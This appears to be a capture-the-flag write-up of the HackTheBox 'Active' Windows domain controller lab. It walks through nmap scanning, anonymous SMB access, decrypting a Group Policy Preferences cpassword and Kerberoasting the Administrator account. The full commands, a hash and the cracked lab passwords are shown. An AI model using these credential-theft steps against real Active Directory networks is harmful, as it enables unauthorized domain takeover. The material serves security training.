Machine Info#
Active is an easy to medium difficulty machine, which features two very prevalent techniques to gain privileges within an Active Directory environment.
Host / IP#
10.10.10.100 / ACTIVE.HTB. We add the record to our /etc/hosts.
User#
Reconnaissance#
We are going to start by running our nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
| └─$ sudo nmap -sC -sV 10.10.10.100 -T4 -oN nmap.txt
Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-14 23:01 CET
Nmap scan report for 10.10.10.100
Host is up (0.035s latency).
Not shown: 982 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-14 22:01:24Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled and required
| smb2-time:
| date: 2026-01-14T22:02:21
|_ start_date: 2026-01-14T21:52:51
|
We don’t see a lot of open services that can be interesting but it’s always good to check the SMB.
SMB#
1
2
3
4
5
6
7
8
9
10
11
12
13
| └─$ smbclient //10.10.10.100/Replication -N
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sat Jul 21 12:37:44 2018
.. D 0 Sat Jul 21 12:37:44 2018
active.htb D 0 Sat Jul 21 12:37:44 2018
smb: \active.htb\policies\> recurse ON
smb: \active.htb\policies\> prompt OFF
smb: \active.htb\policies\> cd ..\
smb: \active.htb\> cd ..\
smb: \> mget *
|
There is an open share that holds the Policies and Group Policy Preferences content. The most interesting file we see immediately is Groups.xml.
1
2
3
| <?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
|
We find a user name active.htb\SVC_TGS and an encrypted password.
InfoThe term “cpassword” refers to a critical security vulnerability in older Microsoft Active Directory Group Policy Preferences (GPP) where passwords were stored in publicly readable XML files within the domain’s SYSVOL share
We can use known tools to grab the password really easily.SVC_TGS password
1
2
| └─$ gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
GPPstillStandingStrong2k18
|
active.htb\SVC_TGS:GPPstillStandingStrong2k18
Having cracked the password we can get the user flag now by authenticating via SMB.
1
2
3
4
5
6
7
8
9
10
11
12
13
| └─$ smbclient //10.10.10.100/Users -U active.htb\\SVC_TGS
Password for [ACTIVE.HTB\SVC_TGS]:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sat Jul 21 16:39:20 2018
.. DR 0 Sat Jul 21 16:39:20 2018
Administrator D 0 Mon Jul 16 12:14:21 2018
All Users DHSrn 0 Tue Jul 14 07:06:44 2009
Default DHR 0 Tue Jul 14 08:38:21 2009
Default User DHSrn 0 Tue Jul 14 07:06:44 2009
desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
Public DR 0 Tue Jul 14 06:57:55 2009
SVC_TGS D 0 Sat Jul 21 17:16:32 2018
|
Root#
Kerberoasting#
We have valid creds and thus we can try the usual checks such as Kerberoasting.
1
2
3
4
5
6
7
| └─$ impacket-GetUserSPNs active.htb/svc_tgs -dc-ip 10.10.10.100 -request -outputfile kerberoast.hashes
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2026-01-14 22:54:00.137757
|
We get the TGS-Rep from Administrator user!
1
2
| └─$ cat kerberoast.hashes
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8acc7e12f80ef3b1e892e5deac4db814$78b2f65e612078fcf3246e3a421f69fd9b8f9c26ae217869a4f134c4150d63fd4b1b9db2f0cc8b1b83554b951cd55f3f49e7f756b647c0572ff20930b9e3731ae1dc85c039d1fdf880bf5d50b79a99071ce74faac4a49360741716462934b806d30ad3bc735d396b8a510c53eeab4bab788185475331db4a1170b59d86dced2ecfa3f9fb94e4e8c3db07a42f1d184ca42d30fb7d4e274fca0b3d3290dc9de9ab4088461d7d7e66bcb4034e0cd38aaff1f2f16a247075658e4525545699f857b069d18d26043279a4597666261b8fe3b86c8e9cd247293ba8c8e1b1b5a382851066cd78ae99ffca472f1d14c3989eaddb5eb1fbb65582fa918d444ccacfddffc2eab228aac394ad37a7c3590340a8989f70153807ce5c276daa9a1bdfede1a715370a543822fa237dfc0b78fd0edf3863914a76163e18decbf84de7f4a6cd7dda9d7b11816c13c9ac35dd1ec21832480a8a0779b94d7b23251c30075b3e4757876b5f80a3b4965c003899bdc638fc39abde871ccaafeaf88504c6f2525b469786a156ab7caefbf5e7619f45fc1ec1043bfc01f9df6a851b2c30ca728298901e09de2cbd213279b598d190199e11ccd34072e58f7447b71a75daab97bbae691dc9b5d5516b6f895e2fb1b3902736059b1e119ff3a5b1a7517cceeb70cf36e476c18d0c6728fb4a7f1316e44bfad8731721f560257641cf485a4b91909c90a01c77859baf47f86917865f13474e5d97012b978c61b71ed3043673e30fe5677a38b6c04f28925c91027fa38d5a7bc307c126bd74c2eb67fb6a6e9730a8379987f10f6a1042d6ba83758044c1d8e337a7e3e75a826087c416a679310dd664e092ba9c42ef95ea781265b7bfded39bf094d79846199b4f0674ba907a949c5db4c5da565e58bba42dba58ec901ee23ba1f83abe7d06aee8ce75e21b44de20b2ac3da6260f2ee7e49cc556800343a6865625dcc8e7ed2636ccb4d0b01ae4025c4eef9c681841a20c9beffe4dfc8c45cbbdcf629677f6b00c48ce4ce09390ed805446143d8e2c5cddb1bd3ea5acf7c888ebaaa093d21a22f9851415a184a4744c1e7eb5469fdc82d5973878ce745f92a5c9874426166cfbb19047bae4f7cc3372881eb8c727c7591310205b5529eacbf395b49646ba4b9b030b1834fab2506435ae8d80a4a40e6d91cf01e419e1fedb1a33da2f88eb3529f78b1c2eb3b75658dd0fbd0f1a1e529384e433c5b9c1cdd992c7344852c432143b797b3157cad2
|
And then we crack it with Hashcat.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| ─$ hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt.gz -r /usr/share/hashcat/rules/best66.rule
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...57cad2
Time.Started.....: Wed Jan 14 23:40:47 2026 (16 secs)
Time.Estimated...: Wed Jan 14 23:41:03 2026 (0 secs)
Kernel.Feature...: Pure Kernel (password length 0-256 bytes)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt.gz)
Guess.Mod........: Rules (/usr/share/hashcat/rules/best66.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.#01........: 45317.8 kH/s (5.41ms) @ Accel:30 Loops:64 Thr:32 Vec:1
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 695654400/946729410 (73.48%)
Rejected.........: 0/695654400 (0.00%)
Restore.Point....: 10521600/14344385 (73.35%)
Restore.Sub.#01..: Salt:0 Amplifier:0-64 Iteration:0-64
Candidate.Engine.: Device Generator
Candidates.#01...: UWM2010 -> n465
Hardware.Mon.#01.: Temp: 55c Util: 43% Core:1965MHz Mem:6000MHz Bus:8
|
Cracked Administrator password
1
| $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$8acc7e12f80ef3b1e892e5deac4db814$78b2f65e612078fcf3246e3a421f69fd9b8f9c26ae217869a4f134c4150d63fd4b1b9db2f0cc8b1b83554b951cd55f3f49e7f756b647c0572ff20930b9e3731ae1dc85c039d1fdf880bf5d50b79a99071ce74faac4a49360741716462934b806d30ad3bc735d396b8a510c53eeab4bab788185475331db4a1170b59d86dced2ecfa3f9fb94e4e8c3db07a42f1d184ca42d30fb7d4e274fca0b3d3290dc9de9ab4088461d7d7e66bcb4034e0cd38aaff1f2f16a247075658e4525545699f857b069d18d26043279a4597666261b8fe3b86c8e9cd247293ba8c8e1b1b5a382851066cd78ae99ffca472f1d14c3989eaddb5eb1fbb65582fa918d444ccacfddffc2eab228aac394ad37a7c3590340a8989f70153807ce5c276daa9a1bdfede1a715370a543822fa237dfc0b78fd0edf3863914a76163e18decbf84de7f4a6cd7dda9d7b11816c13c9ac35dd1ec21832480a8a0779b94d7b23251c30075b3e4757876b5f80a3b4965c003899bdc638fc39abde871ccaafeaf88504c6f2525b469786a156ab7caefbf5e7619f45fc1ec1043bfc01f9df6a851b2c30ca728298901e09de2cbd213279b598d190199e11ccd34072e58f7447b71a75daab97bbae691dc9b5d5516b6f895e2fb1b3902736059b1e119ff3a5b1a7517cceeb70cf36e476c18d0c6728fb4a7f1316e44bfad8731721f560257641cf485a4b91909c90a01c77859baf47f86917865f13474e5d97012b978c61b71ed3043673e30fe5677a38b6c04f28925c91027fa38d5a7bc307c126bd74c2eb67fb6a6e9730a8379987f10f6a1042d6ba83758044c1d8e337a7e3e75a826087c416a679310dd664e092ba9c42ef95ea781265b7bfded39bf094d79846199b4f0674ba907a949c5db4c5da565e58bba42dba58ec901ee23ba1f83abe7d06aee8ce75e21b44de20b2ac3da6260f2ee7e49cc556800343a6865625dcc8e7ed2636ccb4d0b01ae4025c4eef9c681841a20c9beffe4dfc8c45cbbdcf629677f6b00c48ce4ce09390ed805446143d8e2c5cddb1bd3ea5acf7c888ebaaa093d21a22f9851415a184a4744c1e7eb5469fdc82d5973878ce745f92a5c9874426166cfbb19047bae4f7cc3372881eb8c727c7591310205b5529eacbf395b49646ba4b9b030b1834fab2506435ae8d80a4a40e6d91cf01e419e1fedb1a33da2f88eb3529f78b1c2eb3b75658dd0fbd0f1a1e529384e433c5b9c1cdd992c7344852c432143b797b3157cad2:Ticketmaster1968
|
Administrator account pwned. Now we can loging with SMB and get the root.txt.
